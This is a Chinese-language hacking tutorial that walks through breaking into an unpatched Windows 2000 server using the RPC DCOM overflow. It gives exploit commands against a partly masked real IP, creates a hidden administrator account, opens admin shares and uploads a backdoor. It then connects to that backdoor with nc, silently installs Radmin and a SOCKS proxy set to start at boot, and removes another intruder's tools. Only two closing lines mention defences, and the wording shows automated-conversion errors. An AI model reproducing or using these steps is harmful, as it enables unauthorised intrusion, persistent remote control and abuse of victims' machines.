需要的工具：

　　很好的：　radmin.exe

　　扫描工具: retinarpcdcom.exe

　　溢出攻击工具:RpcDcom（通用溢出工具)

　　脚本开启telnet工具：telnet.vbe opentelnet.exe resumetelnet.exe

　　代理：sksockserver.exe

　　后门程序：WinEggDropShellPro3thVersion

　　好了，该做的都做的差未几了。现在开端把~~

　　首先应用retinarpcdcom.exe扫描一个网段。查找有rpc漏洞的机子，这个漏洞需要135端口开放，（想必

　　随便扫一下就会发明有很多主机开放的135端口）。。。。。。

　　(人走运座着都能检到钱) 211.217.50.xx　第一个主机就被扫出来又此漏洞。开端工作

　　看看211.217.50.xx有没有其他的漏洞或是若口令之类的.我们可以应用流光扫描一下, 好了..看样子没有其他的缺点,主机开了3389端口,我们可以上往看一下是xp版本还是win2k哈哈，是win2k server版本

　　展开命令行：

　　[查看dcomrpc的用法　用法 dcomrpc -d [options]　 ]

　　F:\hack>cd rpc\dcomrpc

　　RPC DCOM Expl01t coded by .:[oc192.us]:. Security

　　Complied and Modified by Expl01t www.longker.com

　　Usage:

　　dcomrpc -d [options]

　　Options:

　　 　 -d:　　　　Hostname to attack [Required]

　　 　 -t:　　　　Type [Default: 0]

　　 　 -r:　　　　Return address [Default: Selected from target]

　　 　 -p:　　　　Attack port [Default: 135]

　　 　 -l:　　　　Bindshell port [Default: 666]

　　Types:

　　 　 0 [0x0018759f]: [Win2k-Universal]

　　 　 1 [0x0100139d]: [WinXP-Universal]

　　开端进行溢出：

　　F:\hack>cd rpc\dcomrpc -d　211.217.50.xx 0

　　RPC DCOM remote expl01t - .:[oc192.us]:. Security

　　Complied and recorrected by Expl01t www.longker.com

　　[ ] Resolving host..

　　[ ] Done.

　　[ ] Expl01ting....Just wait......

　　等到呈现，阐明溢出成功

　　c:\winnt\system32>

　　接着我们建立用户

　　c:\winnt\system32>net user blueye$ 1111 /add

　　命令成功完成。

　　把用户添加成超级治理员

　　c:\winnt\system32>net localgroup administrators blueye$ /add

　　命令成功完成。

　　看看共享开了没有,没有的话把共享开开

　　c:\winnt\system32>net share

　　清单是空的。

　　c:\winnt\system32>net share ipc$

　　命令成功完成。

　　c:\winnt\system32>net share admin$

　　命令成功完成。

　　到这里我们进侵告一段落

　　[ 建 立 IPC$ 连 接 ，也可以应用tftp上传 ，先和对方建立连接]

　　F:\hack>net use \\211.217.50.xx\ipc$ '1111' /user:blueye$

　　[ 上 传 一 个 后 门 程 序 到 对 方 的 主 机 里]

　　F:\hack>copy d:\inject.exe \\211.217.50.xx\admin$\system32

　　F:\hack>copy d:\tback.dll \\211.217.50.xx\admin$\system32

　　然后运行后门程序，我们可以应用at命令。但是有的机器把at明令禁止了，建议直接开起telnet

　　应用opentelnet.exe　 封闭开启的telnet应用resumetelnet \\ip user password

　　假如忘记开共享可以应用脚本开启telnet来开共享，用法:

　　cscript telnet.vbe ip user password null port　 (null是验证方法)

　　F:\hack>opentenet \\211.217.50.xx blueye$ 1111 1 4567

　　F:\hack>telnet 211.217.50.xx 4567

　　省略...

　　连接并运行后门程序,运行后门程序命令　根目录：inject.exe -run

　　（后门应用方法和安装都在zip文件里面包含了）

　　后门端口123456

　　F:\hack>nc 211.217.50.xx 123456

　　 　　　　　　　Welcome To WinEggDropShell Matrix Version

　　[Melody
]#

　　下面安装radmin

　　配置好的radmin客户端有4个文件。配置radmin客户端可参考相干文章

　　radmin.reg

　　raddrv.dll

　　admdll.dll

　　r_server.exe

　　把这个4个文件copy c:\winnt\system32

　　在目录下面履行命令

　　c:\winnt\system32>r_server /s radmin.reg　 -----导进注册表

　　c:\winnt\system32>r_server /install /silence -----安装radmin.并且不显示托盘

　　c:\winnt\system32>net start r_server　----- 启动服务

　　可以开启3389的话你自己看着办把，哈哈

　　安装sock代理

　　把sksockserver.exe copy c:\winnt\system32

　　c:\winnt\system32>sksockserver /install　　　　　　　　　-----安装服务

　　c:\winnt\system32>sksockserver -config port 1234　　　　　----端口定在1234　自己可以改

　　c:\winnt\system32>sksockserver -config starttype 2　　　　----开机主动启动

　　c:\winnt\system32>net start skserver　　　　　　　　　　　 ----启动服务

　　最后删除共享

　　net share ipc$ /del

　　net share admin$ /del

　　在安装radmin的时候你发明有人已经安装了。。怎么办？走人？--------NO

　　看把持　 (我输进的内容)

　　后门连接

　　F:\hack>nc 211.217.50.xx 123456

　　 　　　　　　　Welcome To WinEggDropShell Matrix Version

　　[Melody
]#（pslist）

　　[Melody
]#(pskill r_server)

　　[Melody
]#(shell)

　　c:\winnt\system32>(del r_server.exe)

　　c:\winnt\system32>(del admdll.dll)

　　c:\winnt\system32>(del raddrv.dll)

　　copy你自己的上往，然后安装

　　省事的措施直接导进注册表，然后重新输进安装命令运行，就可以了，只是在本来默认端口上面架上了密码
　　
等等。。。。为什么我输进导进注册表命令不管用呢？呈现什么regedit不是可运行的程序之类的 。

　　完了，努力白费了。。。。。。。 -----------------------------NO

　　呈现这样的情况最简略的解决措施telnet上往导进试试看，什么？不是把，有没有搞错阿。。。

　　呵呵，尽管放心，往试试看就知道；还可以先运行radmin 然后在radmin的dos下导进，也是可以的

　　嗬嗬，往试试看吧

　　防御措施：

　　安装rpc补丁

　　应用防火墙过滤135，445，139等端口

感谢 的投稿 本文仅代表作者观点，与楚天站长站立场无关。